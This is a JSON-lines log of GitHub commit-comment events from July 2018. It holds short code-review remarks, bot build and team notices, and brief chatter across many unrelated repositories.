{"id":"8036044507","type":"CommitCommentEvent","actor":{"login":"yeojin-dev"},"repo":{"name":"FC-Oasis/baeminchan-django"},"payload":{"comment":{"id":29881026,"position":null,"line":null,"path":null,"commit_id":"8bf2a451bf1e33cfb3825be3610424567b7b3cdf","created_at":"2018-07-30T07:46:45Z","updated_at":"2018-07-30T07:46:45Z","author_association":"CONTRIBUTOR","body":"이 커밋은 [ADD] 대신에 [UPDATE]로 분류했으면 더 좋았을 텐데... 아쉬움이 남습니다."}},"created_at":"2018-07-30T07:46:45Z"}
{"id":"8036047825","type":"CommitCommentEvent","actor":{"login":"mingyoung"},"repo":{"name":"overtrue/wechat"},"payload":{"comment":{"id":29881042,"position":null,"line":null,"path":null,"commit_id":"22ba22f3cd4d774b5dbc54e3051de7de9a51b59b","created_at":"2018-07-30T07:47:31Z","updated_at":"2018-07-30T07:47:31Z","author_association":"COLLABORATOR","body":"@morphet81 Hi, you can create a pull request to fix this issue."}},"created_at":"2018-07-30T07:47:31Z"}
{"id":"8036048876","type":"CommitCommentEvent","actor":{"login":"zhangyis"},"repo":{"name":"zhangyis/firstcode"},"payload":{"comment":{"id":29881049,"position":1,"line":1,"path":"servers-dev.yml","commit_id":"a351db3e4b1423f0205f7b14260968f48b7099a9","created_at":"2018-07-30T07:47:46Z","updated_at":"2018-07-30T07:47:46Z","author_association":"OWNER","body":"spring: "}},"created_at":"2018-07-30T07:47:46Z"}
{"id":"8036051496","type":"CommitCommentEvent","actor":{"login":"bgol"},"repo":{"name":"eyeonus/Trade-Dangerous"},"payload":{"comment":{"id":29881052,"position":24,"line":236,"path":"plugins/eddblink_plug.py","commit_id":"c613d5473e2ca26b3763549ebdd075ba4c0c9582","created_at":"2018-07-30T07:48:22Z","updated_at":"2018-07-30T07:48:22Z","author_association":"CONTRIBUTOR","body":"This could get tricky (also in line 444 ;)"}},"created_at":"2018-07-30T07:48:22Z"}
{"id":"8036051942","type":"CommitCommentEvent","actor":{"login":"madeye"},"repo":{"name":"shadowsocks/shadowsocks-android"},"payload":{"comment":{"id":29881053,"position":null,"line":null,"path":null,"commit_id":"7687a19cc1ab6e8ee501cd16d4baaf3e960183f9","created_at":"2018-07-30T07:48:28Z","updated_at":"2018-07-30T07:48:28Z","author_association":"CONTRIBUTOR","body":"This is performed manually."}},"created_at":"2018-07-30T07:48:28Z"}
{"id":"8036061378","type":"CommitCommentEvent","actor":{"login":"hoangthan"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29881070,"position":2,"line":160,"path":"Vidly/Vidly.csproj","commit_id":"b727a26e1b4b88abe84a8b48208fec537db2ed43","created_at":"2018-07-30T07:50:37Z","updated_at":"2018-07-30T07:50:37Z","author_association":"NONE","body":"which file should I put these line  ???"}},"created_at":"2018-07-30T07:50:37Z"}
{"id":"8036061942","type":"CommitCommentEvent","actor":{"login":"wavezhang"},"repo":{"name":"git/git"},"payload":{"comment":{"id":29881071,"position":null,"line":null,"path":null,"commit_id":"e83c5163316f89bfbde7d9ab23ca2e25604af290","created_at":"2018-07-30T07:50:44Z","updated_at":"2018-07-30T07:50:44Z","author_association":"NONE","body":"@wavezhang 到此一游"}},"created_at":"2018-07-30T07:50:44Z"}
{"id":"8036064235","type":"CommitCommentEvent","actor":{"login":"chrissie-c"},"repo":{"name":"corosync/corosync"},"payload":{"comment":{"id":29881074,"position":null,"line":null,"path":null,"commit_id":"1fe66ecaecd28a79520af20ae606af17e3ae58b7","created_at":"2018-07-30T07:51:15Z","updated_at":"2018-07-30T07:51:15Z","author_association":"CONTRIBUTOR","body":"Looks good to me. There are a couple of whitespace issues that I recommend you fix before Honza gets back though ;-) \r\n\r\nsee lines 321/322 & 408"}},"created_at":"2018-07-30T07:51:15Z"}
{"id":"8036070850","type":"CommitCommentEvent","actor":{"login":"fnoks"},"repo":{"name":"h5p/h5p-editor-php-library"},"payload":{"comment":{"id":29881081,"position":null,"line":null,"path":null,"commit_id":"66b396b3700f3cff4cf582e9793ab2e191245b24","created_at":"2018-07-30T07:52:46Z","updated_at":"2018-07-30T07:52:46Z","author_association":"MEMBER","body":"I should have written IE10, which we have supported up to now. We have now agreed to stop supporting IE10, so then we can use const :)"}},"created_at":"2018-07-30T07:52:46Z"}
{"id":"8036075069","type":"CommitCommentEvent","actor":{"login":"ailoli2333"},"repo":{"name":"ailoli2333/Spiders"},"payload":{"comment":{"id":29881091,"position":null,"line":null,"path":null,"commit_id":"5ff310841d5230735a942eb318a80326eb2b57e9","created_at":"2018-07-30T07:53:43Z","updated_at":"2018-07-30T07:53:43Z","author_association":"OWNER","body":"网易云评论爬虫"}},"created_at":"2018-07-30T07:53:43Z"}
{"id":"8036075145","type":"CommitCommentEvent","actor":{"login":"zarelit"},"repo":{"name":"rgrove/rawgit"},"payload":{"comment":{"id":29881092,"position":null,"line":null,"path":null,"commit_id":"1d38e173aa2b4ad2ad7074e93abb9ac8e0a7081e","created_at":"2018-07-30T07:53:44Z","updated_at":"2018-07-30T07:53:44Z","author_association":"NONE","body":"@rgrove TBH the user experience is not the best out there but there are no serious security concerns, EFAIL was an implementation issue and it was fixed :-) \r\nIf you don't want to receive PGP-encrypted emails that's your choice and it's totally okay, I just wanted to point out that googling \"don't use pgp\" does not give any hint about why I shouldn't use it to communicate sensitive security issues."}},"created_at":"2018-07-30T07:53:44Z"}
{"id":"8036076462","type":"CommitCommentEvent","actor":{"login":"chubinou"},"repo":{"name":"Hchnr/VLC-qml2"},"payload":{"comment":{"id":29881098,"position":6,"line":31,"path":"modules/gui/qt/qml/controlbar/CenterToolbar.qml","commit_id":"c3a18d04dd80665b3d5a1d22cc02ff9520ce360a","created_at":"2018-07-30T07:54:02Z","updated_at":"2018-07-30T07:54:02Z","author_association":"CONTRIBUTOR","body":"Do you think you can factorize/share the button style between the different  components"}},"created_at":"2018-07-30T07:54:02Z"}
{"id":"8036078087","type":"CommitCommentEvent","actor":{"login":"otacke"},"repo":{"name":"h5p/h5p-editor-php-library"},"payload":{"comment":{"id":29881099,"position":null,"line":null,"path":null,"commit_id":"66b396b3700f3cff4cf582e9793ab2e191245b24","created_at":"2018-07-30T07:54:25Z","updated_at":"2018-07-30T07:54:25Z","author_association":"CONTRIBUTOR","body":"Lucky me :-) Frode has seen my new code before and didn't object, so I assumed it was OK."}},"created_at":"2018-07-30T07:54:25Z"}
{"id":"8036083562","type":"CommitCommentEvent","actor":{"login":"RemoteWeatherStation"},"repo":{"name":"RemoteWeatherStation/Remote-Weather-Station"},"payload":{"comment":{"id":29881104,"position":2,"line":1,"path":"A-Temperature_logger.ino","commit_id":"8ec20ffb2fe929933021806d07bde5c16b77697d","created_at":"2018-07-30T07:55:41Z","updated_at":"2018-07-30T07:55:41Z","author_association":"OWNER","body":"This is the millis program, with no deepsleep or low power BME280"}},"created_at":"2018-07-30T07:55:41Z"}
{"id":"8036085835","type":"CommitCommentEvent","actor":{"login":"RMaksymczuk"},"repo":{"name":"ds-consultants/dynamic-cv-generator"},"payload":{"comment":{"id":29881106,"position":18,"line":17,"path":"src/app/project/project.component.html","commit_id":"a8a5db34daeccebbebcd0222290f0bc931d125ae","created_at":"2018-07-30T07:56:12Z","updated_at":"2018-07-30T07:56:12Z","author_association":"CONTRIBUTOR","body":"I needed to check `.length` because we are initialising technologies with empty array and `project.technologies` is not enough to define if we should or shouldn't show this section"}},"created_at":"2018-07-30T07:56:12Z"}
{"id":"8036096749","type":"CommitCommentEvent","actor":{"login":"Admin9705"},"repo":{"name":"Admin9705/PlexGuide.com-The-Awesome-Plex-Server"},"payload":{"comment":{"id":29881118,"position":null,"line":null,"path":null,"commit_id":"50fede85b9a7e42d12e004fe79e7c8d73bcb53c5","created_at":"2018-07-30T07:58:38Z","updated_at":"2018-07-30T07:58:38Z","author_association":"OWNER","body":"Looks nice"}},"created_at":"2018-07-30T07:58:38Z"}
{"id":"8036098510","type":"CommitCommentEvent","actor":{"login":"ZheniaTrochun"},"repo":{"name":"dimaLytvyniuk/ScalaLearning"},"payload":{"comment":{"id":29881120,"position":14,"line":14,"path":"Hortsman/src/Part5/BankAccount.scala","commit_id":"2c9b9bb6c668cc20c55619950e57b238e036e4c1","created_at":"2018-07-30T07:59:02Z","updated_at":"2018-07-30T07:59:02Z","author_association":"NONE","body":"in scala code you don't have to use `return` statement\r\nit's compiled to throwing exception with result"}},"created_at":"2018-07-30T07:59:02Z"}
{"id":"8036104614","type":"CommitCommentEvent","actor":{"login":"RemoteWeatherStation"},"repo":{"name":"RemoteWeatherStation/Remote-Weather-Station"},"payload":{"comment":{"id":29881134,"position":1,"line":31,"path":"A-Temperature_logger.ino","commit_id":"a6e6ff5fd41f4ec91fd59c30cef5bfa69d280772","created_at":"2018-07-30T08:00:19Z","updated_at":"2018-07-30T08:00:19Z","author_association":"OWNER","body":"This is the delay program. It takes readings every 10 seconds. The program can work over wifi and display a webpage."}},"created_at":"2018-07-30T08:00:19Z"}
{"id":"8036105755","type":"CommitCommentEvent","actor":{"login":"kulpreet"},"repo":{"name":"ChluNetwork/chlu-ipfs-support"},"payload":{"comment":{"id":29881137,"position":4,"line":202,"path":"src/modules/reviewrecords.js","commit_id":"b384fb49bf05fe47bdd4d3fb056ef5f646513c66","created_at":"2018-07-30T08:00:33Z","updated_at":"2018-07-30T08:00:33Z","author_association":"CONTRIBUTOR","body":"@fazo96 I think we should avoid the optimisation. It is OK to force the DID to be published."}},"created_at":"2018-07-30T08:00:33Z"}
{"id":"8036106762","type":"CommitCommentEvent","actor":{"login":"RyanMKrol"},"repo":{"name":"StealthPad/Wolverine"},"payload":{"comment":{"id":29881143,"position":4,"line":46,"path":"Tests/WolverineTests/PropertyCodableRequestTests.swift","commit_id":"87cd15b98ae12453a3be3df93473135df230d6d9","created_at":"2018-07-30T08:00:45Z","updated_at":"2018-07-30T08:00:45Z","author_association":"NONE","body":"I don't think this is what we're actually testing here. Let's be super explicit with our test names, it'll help me understand what we're trying to do in them"}},"created_at":"2018-07-30T08:00:45Z"}
{"id":"8036107031","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29881144,"position":null,"line":null,"path":null,"commit_id":"43b81cde3af78d6d5e583df6bed5bd32c161620e","created_at":"2018-07-30T08:00:48Z","updated_at":"2018-07-30T08:00:48Z","author_association":"NONE","body":"158922394_Issue#4431 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2331 of 2331 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-43b81cde3af78d6d5e583df6bed5bd32c161620e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-43b81cde3af78d6d5e583df6bed5bd32c161620e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-43b81cde3af78d6d5e583df6bed5bd32c161620e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.21%25-green.png)</a>\n"}},"created_at":"2018-07-30T08:00:48Z"}
{"id":"8036109543","type":"CommitCommentEvent","actor":{"login":"kulpreet"},"repo":{"name":"ChluNetwork/chlu-ipfs-support"},"payload":{"comment":{"id":29881147,"position":8,"line":206,"path":"src/modules/reviewrecords.js","commit_id":"b384fb49bf05fe47bdd4d3fb056ef5f646513c66","created_at":"2018-07-30T08:01:21Z","updated_at":"2018-07-30T08:01:21Z","author_association":"CONTRIBUTOR","body":"Should reuse the exponential (or was it linear in the end?) backoff approach we used earlier."}},"created_at":"2018-07-30T08:01:21Z"}
{"id":"8036118601","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/assimulo-feedstock"},"payload":{"comment":{"id":29881152,"position":null,"line":null,"path":null,"commit_id":"3d12d2793a59de12e892e5979f08f24a8b071e85","created_at":"2018-07-30T08:03:28Z","updated_at":"2018-07-30T08:03:28Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @chria was added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-30T08:03:28Z"}
{"id":"8036120113","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"Railcraft/Railcraft"},"payload":{"comment":{"id":29881155,"position":51,"line":71,"path":"src/main/java/mods/railcraft/common/plugins/jei/RailcraftJEIPlugin.java","commit_id":"c30f172437779b64f1af439daf69827c0217050d","created_at":"2018-07-30T08:03:49Z","updated_at":"2018-07-30T08:03:49Z","author_association":"MEMBER","body":"Why?"}},"created_at":"2018-07-30T08:03:49Z"}
{"id":"8036120132","type":"CommitCommentEvent","actor":{"login":"RyanMKrol"},"repo":{"name":"StealthPad/Wolverine"},"payload":{"comment":{"id":29881156,"position":18,"line":60,"path":"Tests/WolverineTests/PropertyCodableRequestTests.swift","commit_id":"87cd15b98ae12453a3be3df93473135df230d6d9","created_at":"2018-07-30T08:03:49Z","updated_at":"2018-07-30T08:03:49Z","author_association":"NONE","body":"I don't think we should be using guards like this in our tests. Having control statements in our unit tests just seems odd. Let's compare the unwrapped optional to a value and let the test fail naturally. As well if we return, this entire test stops running (no idea if this happens when XCTAssertEqual fails, correct me if I'm wrong) so we can't see any other test failures."}},"created_at":"2018-07-30T08:03:49Z"}
{"id":"8036127756","type":"CommitCommentEvent","actor":{"login":"sgerrand"},"repo":{"name":"FundingCircle/learn-you-some-kafka"},"payload":{"comment":{"id":29881169,"position":null,"line":null,"path":null,"commit_id":"ac29edc13689d46e7af193591c434901bdc3022f","created_at":"2018-07-30T08:05:34Z","updated_at":"2018-07-30T08:05:34Z","author_association":"NONE","body":"👌 Thanks! 💝 "}},"created_at":"2018-07-30T08:05:34Z"}
{"id":"8036129274","type":"CommitCommentEvent","actor":{"login":"sakshi-grover"},"repo":{"name":"sakshi-grover/Demoproj"},"payload":{"comment":{"id":29881171,"position":null,"line":null,"path":null,"commit_id":"2528d3a8bf4953d8f94bf52e85f17429605e535d","created_at":"2018-07-30T08:05:54Z","updated_at":"2018-07-30T08:05:54Z","author_association":"OWNER","body":"jbn"}},"created_at":"2018-07-30T08:05:54Z"}
{"id":"8036130233","type":"CommitCommentEvent","actor":{"login":"1688pc"},"repo":{"name":"1688pc/AdvancedConnectPlugin"},"payload":{"comment":{"id":29881174,"position":null,"line":null,"path":null,"commit_id":"ff3ce691eec115f732b2b47cbec5cc3664ae3445","created_at":"2018-07-30T08:06:08Z","updated_at":"2018-07-30T08:06:08Z","author_association":"OWNER","body":"2"}},"created_at":"2018-07-30T08:06:08Z"}
{"id":"8036132248","type":"CommitCommentEvent","actor":{"login":"1688pc"},"repo":{"name":"1688pc/AdvancedConnectPlugin"},"payload":{"comment":{"id":29881186,"position":null,"line":null,"path":null,"commit_id":"ff3ce691eec115f732b2b47cbec5cc3664ae3445","created_at":"2018-07-30T08:06:37Z","updated_at":"2018-07-30T08:06:37Z","author_association":"OWNER","body":"2"}},"created_at":"2018-07-30T08:06:37Z"}
{"id":"8036133653","type":"CommitCommentEvent","actor":{"login":"kimdaeman14"},"repo":{"name":"bdsafdb33/testgit"},"payload":{"comment":{"id":29881191,"position":null,"line":null,"path":null,"commit_id":"cc571bb9da0c1b88b3d0f5cc73bc0f63252083e2","created_at":"2018-07-30T08:06:56Z","updated_at":"2018-07-30T08:06:56Z","author_association":"CONTRIBUTOR","body":"mmm"}},"created_at":"2018-07-30T08:06:56Z"}
{"id":"8036137414","type":"CommitCommentEvent","actor":{"login":"zimplexing"},"repo":{"name":"EmptyCup20/easy-tool-front"},"payload":{"comment":{"id":29881200,"position":null,"line":null,"path":null,"commit_id":"f95258a3b8f3a21e3bed81646003ba4261c9a70c","created_at":"2018-07-30T08:07:48Z","updated_at":"2018-07-30T08:07:48Z","author_association":"NONE","body":"没有配置eslint"}},"created_at":"2018-07-30T08:07:48Z"}
{"id":"8036141926","type":"CommitCommentEvent","actor":{"login":"OxLemonxO"},"repo":{"name":"TFPatches/TotalFreedomMod"},"payload":{"comment":{"id":29881208,"position":14,"line":236,"path":"src/main/java/me/totalfreedom/totalfreedommod/rank/RankManager.java","commit_id":"c238f749655e4b1a1225c5ea345fdae161fa1830","created_at":"2018-07-30T08:08:50Z","updated_at":"2018-07-30T08:08:50Z","author_association":"MEMBER","body":"Discord has to be enabled for tags to work?"}},"created_at":"2018-07-30T08:08:50Z"}
{"id":"8036144494","type":"CommitCommentEvent","actor":{"login":"OmerBulbul"},"repo":{"name":"OmerBulbul/oyk2018_Frontend"},"payload":{"comment":{"id":29881215,"position":null,"line":null,"path":null,"commit_id":"0ee7dde7a2dbad082dce961e747cd992803c07b8","created_at":"2018-07-30T08:09:25Z","updated_at":"2018-07-30T08:09:25Z","author_association":"OWNER","body":"readme eklendi"}},"created_at":"2018-07-30T08:09:25Z"}
{"id":"8036144758","type":"CommitCommentEvent","actor":{"login":"zimplexing"},"repo":{"name":"EmptyCup20/easy-tool-front"},"payload":{"comment":{"id":29881218,"position":6,"line":6,"path":"bin/config.js","commit_id":"f95258a3b8f3a21e3bed81646003ba4261c9a70c","created_at":"2018-07-30T08:09:29Z","updated_at":"2018-07-30T08:09:29Z","author_association":"NONE","body":"建议\r\n去除多余的注释代码"}},"created_at":"2018-07-30T08:09:29Z"}
{"id":"8036148857","type":"CommitCommentEvent","actor":{"login":"Sattdr"},"repo":{"name":"BitScreenerTech/SmartContracts"},"payload":{"comment":{"id":29881231,"position":null,"line":null,"path":null,"commit_id":"d2f4c4725716eb54081c31c1aa58a93909307f5b","created_at":"2018-07-30T08:10:28Z","updated_at":"2018-07-30T08:10:28Z","author_association":"NONE","body":"launch"}},"created_at":"2018-07-30T08:10:28Z"}
{"id":"8036148915","type":"CommitCommentEvent","actor":{"login":"Telesphoreo"},"repo":{"name":"TFPatches/TotalFreedomMod"},"payload":{"comment":{"id":29881232,"position":14,"line":236,"path":"src/main/java/me/totalfreedom/totalfreedommod/rank/RankManager.java","commit_id":"c238f749655e4b1a1225c5ea345fdae161fa1830","created_at":"2018-07-30T08:10:29Z","updated_at":"2018-07-30T08:10:29Z","author_association":"NONE","body":"Yes. Every player who uses player verify is discord enabled."}},"created_at":"2018-07-30T08:10:29Z"}
{"id":"8036165629","type":"CommitCommentEvent","actor":{"login":"dosyago-coder-0"},"repo":{"name":"resin-io-modules/rendition"},"payload":{"comment":{"id":29881262,"position":null,"line":null,"path":null,"commit_id":"9c279678444c378f8db05572f436e514d49577e6","created_at":"2018-07-30T08:14:09Z","updated_at":"2018-07-30T08:14:09Z","author_association":"NONE","body":"Looks good! 👍 😃 "}},"created_at":"2018-07-30T08:14:09Z"}
{"id":"8036169081","type":"CommitCommentEvent","actor":{"login":"zimplexing"},"repo":{"name":"EmptyCup20/easy-tool-front"},"payload":{"comment":{"id":29881270,"position":20,"line":18,"path":"bin/pull.js","commit_id":"24328d5b2c891f6aba57ee312a67976df00c0dc5","created_at":"2018-07-30T08:14:51Z","updated_at":"2018-07-30T08:14:51Z","author_association":"NONE","body":"直接通过JSON.parse转不行吗"}},"created_at":"2018-07-30T08:14:51Z"}
{"id":"8036172837","type":"CommitCommentEvent","actor":{"login":"zimplexing"},"repo":{"name":"EmptyCup20/easy-tool-front"},"payload":{"comment":{"id":29881280,"position":2,"line":2,"path":"bin/request.js","commit_id":"24328d5b2c891f6aba57ee312a67976df00c0dc5","created_at":"2018-07-30T08:15:38Z","updated_at":"2018-07-30T08:15:38Z","author_association":"NONE","body":"建议\r\n建议使用比较熟悉的axios"}},"created_at":"2018-07-30T08:15:38Z"}
{"id":"8036178051","type":"CommitCommentEvent","actor":{"login":"CSRaghunandan"},"repo":{"name":"manuel-uberti/.emacs.d"},"payload":{"comment":{"id":29881287,"position":6,"line":26,"path":"lisp/mu-style.el","commit_id":"a56adfb626b49ba8f99e19d378664579bd56123b","created_at":"2018-07-30T08:16:44Z","updated_at":"2018-07-30T08:16:44Z","author_association":"NONE","body":"`default-text-scale-mode` automatically binds these three commands to the same keybindnig. No need to set them up manually"}},"created_at":"2018-07-30T08:16:44Z"}
{"id":"8036178234","type":"CommitCommentEvent","actor":{"login":"jrolfs"},"repo":{"name":"johnnonolan/ReadMe"},"payload":{"comment":{"id":29881288,"position":null,"line":null,"path":null,"commit_id":"09ce73e554376a9c149c9c519f3a55dc9887cdf8","created_at":"2018-07-30T08:16:46Z","updated_at":"2018-07-30T08:16:46Z","author_association":"NONE","body":"I think I like this person (இ▽இ) ... aside from the attempt at ironic/redundant British accent humor 🙄.\r\n\r\n**↯↯↯↯**\r\n**Note →** ┬──┬◡ﾉ(° -°ﾉ)  – *this is a Firefox or GitHub bug*\r\n**⇈⇈⇈**\r\n\r\n<img width=\"699\" alt=\"ello-getthab\" src=\"https://user-images.githubusercontent.com/288160/43385239-08b88074-9395-11e8-8ca4-80891f2beb76.png\">\r\n"}},"created_at":"2018-07-30T08:16:46Z"}
{"id":"8036179299","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29881290,"position":null,"line":null,"path":null,"commit_id":"17fa9c0f47f55b0fae947eb08f428f6d3bf7abaa","created_at":"2018-07-30T08:17:00Z","updated_at":"2018-07-30T08:17:00Z","author_association":"COLLABORATOR","body":"Puzzle `747-f5927788` disappeared from [`src/test/resources/com/zerocracy/bundles/not_assign_task_to_reporter/_after.groovy`](https://github.com/zerocracy/farm/blob/master/src/test/resources/com/zerocracy/bundles/not_assign_task_to_reporter/_after.groovy), that's why I closed #1089. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-30T08:17:00Z"}
{"id":"8036181167","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29881292,"position":null,"line":null,"path":null,"commit_id":"17fa9c0f47f55b0fae947eb08f428f6d3bf7abaa","created_at":"2018-07-30T08:17:21Z","updated_at":"2018-07-30T08:17:21Z","author_association":"COLLABORATOR","body":"Puzzle `1089-d64db1c1` discovered in   [`src/test/resources/com/zerocracy/bundles/not_assign_task_to_reporter/_after.groovy`](  https://github.com/zerocracy/farm/blob/master/src/test/resources/com/zerocracy/bundles/not_assign_task_to_reporter/_after.groovy)   and submitted as #1504. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-30T08:17:21Z"}
{"id":"8036182073","type":"CommitCommentEvent","actor":{"login":"yhere123"},"repo":{"name":"yhere123/simple-java-maven-app"},"payload":{"comment":{"id":29881294,"position":null,"line":null,"path":null,"commit_id":"0d85b7e1fd39bc6978511f92381aa10534ca4c1b","created_at":"2018-07-30T08:17:32Z","updated_at":"2018-07-30T08:17:32Z","author_association":"OWNER","body":"commit change"}},"created_at":"2018-07-30T08:17:32Z"}
{"id":"8036183354","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29881297,"position":null,"line":null,"path":null,"commit_id":"1a71ceca608612806291bd83815f55550dbf8441","created_at":"2018-07-30T08:17:48Z","updated_at":"2018-07-30T08:17:48Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 744](https://travis-ci.org/per1234/arduino-ci-script/builds/409737098) will be found at:\nhttps://gist.github.com/arduino-ci-script-bot/9371a7dedb73a560142ff2ca514b79db#file-travis_ci_job_report_00744-001-tsv"}},"created_at":"2018-07-30T08:17:48Z"}
{"id":"8036183766","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29881298,"position":null,"line":null,"path":null,"commit_id":"1a71ceca608612806291bd83815f55550dbf8441","created_at":"2018-07-30T08:17:54Z","updated_at":"2018-07-30T08:17:54Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 744](https://travis-ci.org/per1234/arduino-ci-script/builds/409737098) will be found at:\nhttps://github.com/per1234/CI-reports/tree/arduino-ci-script/build_00744"}},"created_at":"2018-07-30T08:17:54Z"}
{"id":"8036186594","type":"CommitCommentEvent","actor":{"login":"damakin"},"repo":{"name":"damakin/skyeng-tasks"},"payload":{"comment":{"id":29881317,"position":3,"line":3,"path":"DataProvider.php","commit_id":"9e5baa1ff5443658be757dc65dda70c46b4ad568","created_at":"2018-07-30T08:18:29Z","updated_at":"2018-07-30T08:18:29Z","author_association":"OWNER","body":"Это имя папки, а не namespace"}},"created_at":"2018-07-30T08:18:29Z"}
{"id":"8036191203","type":"CommitCommentEvent","actor":{"login":"lirantal"},"repo":{"name":"unshiftio/url-parse"},"payload":{"comment":{"id":29881367,"position":37,"line":37,"path":"SECURITY.md","commit_id":"d7b582ec1243e8024e60ac0b62d2569c939ef5de","created_at":"2018-07-30T08:19:29Z","updated_at":"2018-07-30T08:19:29Z","author_association":"NONE","body":"@3rd-Eden that's really awesome that you're adding this!\r\nWe have a template over at the security-wg repo (https://github.com/nodejs/security-wg/blob/master/processes/responsible_disclosure_template.md) that I'd be happy to work with you on to improve with references to what you've also added here. \r\n\r\nYou may also add a security badge to raise awareness:\r\n[![Security Responsible Disclosure](https://img.shields.io/badge/Security-Responsible%20Disclosure-yellow.svg)](https://github.com/nodejs/security-wg/blob/master/processes/responsible_disclosure_template.md\r\n)"}},"created_at":"2018-07-30T08:19:29Z"}
{"id":"8036192575","type":"CommitCommentEvent","actor":{"login":"damakin"},"repo":{"name":"damakin/skyeng-tasks"},"payload":{"comment":{"id":29881385,"position":5,"line":5,"path":"DataProvider.php","commit_id":"9e5baa1ff5443658be757dc65dda70c46b4ad568","created_at":"2018-07-30T08:19:46Z","updated_at":"2018-07-30T08:19:46Z","author_association":"OWNER","body":"По имени класса неясно, с каким сторонним сервисом интеграция"}},"created_at":"2018-07-30T08:19:46Z"}
{"id":"8036194309","type":"CommitCommentEvent","actor":{"login":"mtbc"},"repo":{"name":"openmicroscopy/openmicroscopy"},"payload":{"comment":{"id":29881420,"position":24,"line":81,"path":"components/insight/SRC/org/openmicroscopy/shoola/agents/fsimporter/view/FailedImportDialog.java","commit_id":"58b50ef9f13925eaeaf691887da722bb7bbf7dec","created_at":"2018-07-30T08:20:09Z","updated_at":"2018-07-30T08:20:09Z","author_association":"MEMBER","body":"uninentional?"}},"created_at":"2018-07-30T08:20:09Z"}
{"id":"8036194745","type":"CommitCommentEvent","actor":{"login":"DoumanAsh"},"repo":{"name":"Artikash/NextHooker"},"payload":{"comment":{"id":29881426,"position":8,"line":60,"path":"GUI/extensions.cpp","commit_id":"b5eef8b3fe81b6ef04a18e36a02cfe243b283403","created_at":"2018-07-30T08:20:14Z","updated_at":"2018-07-30T08:20:14Z","author_association":"CONTRIBUTOR","body":"note that `delete[]` here is UB as you cannot control how user allocated memory."}},"created_at":"2018-07-30T08:20:14Z"}
{"id":"8036195951","type":"CommitCommentEvent","actor":{"login":"mtbc"},"repo":{"name":"openmicroscopy/openmicroscopy"},"payload":{"comment":{"id":29881441,"position":15,"line":58,"path":"components/insight/SRC/org/openmicroscopy/shoola/agents/fsimporter/view/FailedImportDialog.java","commit_id":"58b50ef9f13925eaeaf691887da722bb7bbf7dec","created_at":"2018-07-30T08:20:29Z","updated_at":"2018-07-30T08:20:29Z","author_association":"MEMBER","body":"Maybe use `SortedMap` type here to help make intent clear."}},"created_at":"2018-07-30T08:20:29Z"}
{"id":"8036199205","type":"CommitCommentEvent","actor":{"login":"damakin"},"repo":{"name":"damakin/skyeng-tasks"},"payload":{"comment":{"id":29881508,"position":7,"line":7,"path":"DataProvider.php","commit_id":"9e5baa1ff5443658be757dc65dda70c46b4ad568","created_at":"2018-07-30T08:21:11Z","updated_at":"2018-07-30T08:21:11Z","author_association":"OWNER","body":"Тип данных"}},"created_at":"2018-07-30T08:21:11Z"}
{"id":"8036203989","type":"CommitCommentEvent","actor":{"login":"damakin"},"repo":{"name":"damakin/skyeng-tasks"},"payload":{"comment":{"id":29881637,"position":9,"line":9,"path":"DataProvider.php","commit_id":"9e5baa1ff5443658be757dc65dda70c46b4ad568","created_at":"2018-07-30T08:22:11Z","updated_at":"2018-07-30T08:22:11Z","author_association":"OWNER","body":"PhpDoc?"}},"created_at":"2018-07-30T08:22:11Z"}
